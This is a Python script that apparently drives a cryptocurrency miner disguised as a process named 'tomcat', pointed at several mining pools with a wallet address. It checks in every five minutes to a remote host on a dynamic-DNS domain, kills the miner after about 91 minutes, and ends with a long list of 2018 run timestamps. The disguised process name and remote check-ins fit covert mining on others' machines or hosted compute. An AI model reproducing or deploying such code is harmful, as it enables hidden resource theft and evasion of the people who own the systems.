import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:43:03.140536
#2018-02-17 16:29:06.800476
#2018-02-17 18:17:04.666012
#2018-02-17 20:03:06.465646
#2018-02-17 21:51:07.564998
#2018-02-17 23:36:07.040536
#2018-02-18 01:25:06.629737
#2018-02-18 03:12:04.014214
#2018-02-18 04:59:05.605658
#2018-02-18 06:51:07.186647
#2018-02-18 08:39:06.802829
#2018-02-18 10:25:01.412648
#2018-02-18 12:11:05.644594
#2018-02-18 13:56:06.902694
#2018-02-18 15:46:01.719991
#2018-02-18 17:35:06.137117
#2018-02-18 19:23:04.953737
#2018-02-18 21:08:05.012557
#2018-02-18 22:55:01.362550
#2018-02-19 00:42:07.110466
#2018-02-19 02:28:07.025916
#2018-02-19 04:15:03.107744
#2018-02-19 05:58:05.077110
#2018-02-19 07:46:02.148361
#2018-02-19 09:36:06.342286
#2018-02-19 11:25:07.733711
#2018-02-19 13:12:04.058658
#2018-02-19 15:01:11.138225
#2018-02-19 16:49:08.622677
#2018-02-19 18:36:01.413105
#2018-02-19 20:22:02.099864
#2018-02-19 22:12:04.817542
#2018-02-19 23:58:04.507113
#2018-02-20 01:44:03.978909
#2018-02-20 03:33:03.981734
#2018-02-20 05:20:08.137264
#2018-02-20 07:04:07.276560
#2018-02-20 08:50:05.123100
#2018-02-20 10:34:06.102681
#2018-02-20 12:19:06.843698
#2018-02-20 14:07:06.206238
#2018-02-20 15:51:09.860109
#2018-02-20 17:37:07.935549
#2018-02-20 19:26:08.750091
#2018-02-20 21:15:06.433078
#2018-02-20 23:01:01.624875
#2018-02-21 00:44:01.784275
#2018-02-21 02:30:01.643745
#2018-02-21 04:16:06.670873
#2018-02-21 06:03:04.214967
#2018-02-21 07:49:04.170532
#2018-02-21 09:35:08.417172
#2018-02-21 11:25:07.136132
#2018-02-21 13:14:08.028909
#2018-02-21 15:00:14.280615
#2018-02-21 16:52:07.176076
#2018-02-21 18:42:04.919070
#2018-02-21 20:27:01.252346
#2018-02-21 22:14:01.982125
#2018-02-22 00:03:04.448202
#2018-02-22 01:51:01.411752
#2018-02-22 03:39:07.745400
#2018-02-22 05:27:04.226285
#2018-02-22 07:12:04.554196
#2018-02-22 08:59:06.222599
#2018-02-22 10:47:01.391675
#2018-02-22 12:33:08.917176
#2018-02-22 14:18:01.740447
#2018-02-22 16:06:01.568282
#2018-02-22 17:51:12.986242
#2018-02-22 19:38:07.975112
#2018-02-22 21:30:05.531799
#2018-02-22 23:17:01.339331
#2018-02-23 01:06:07.477181
#2018-02-23 02:54:06.479834
#2018-02-23 04:42:03.671233
#2018-02-23 06:27:06.071622
#2018-02-23 08:15:08.200046
#2018-02-23 10:32:04.669849
#2018-02-23 12:26:04.315424
#2018-02-23 14:15:01.498676
#2018-02-23 16:05:08.745240
#2018-02-23 17:51:01.408075
#2018-02-23 19:37:05.629645
#2018-02-23 21:21:05.642410
#2018-02-23 23:09:01.590348
#2018-02-24 00:57:05.736628
#2018-02-24 02:53:04.452899
#2018-02-24 04:41:04.121393
#2018-02-24 06:25:03.119956
#2018-02-24 08:13:05.885118
#2018-02-24 09:57:03.505048
#2018-02-24 11:53:05.218455
#2018-02-24 13:43:02.001876
#2018-02-24 15:32:07.872950
#2018-02-24 17:26:01.601559
#2018-02-24 19:13:04.220173
#2018-02-24 21:01:04.120934
#2018-02-25 01:19:04.395061
#2018-02-25 05:21:05.831214
#2018-02-25 11:34:04.104261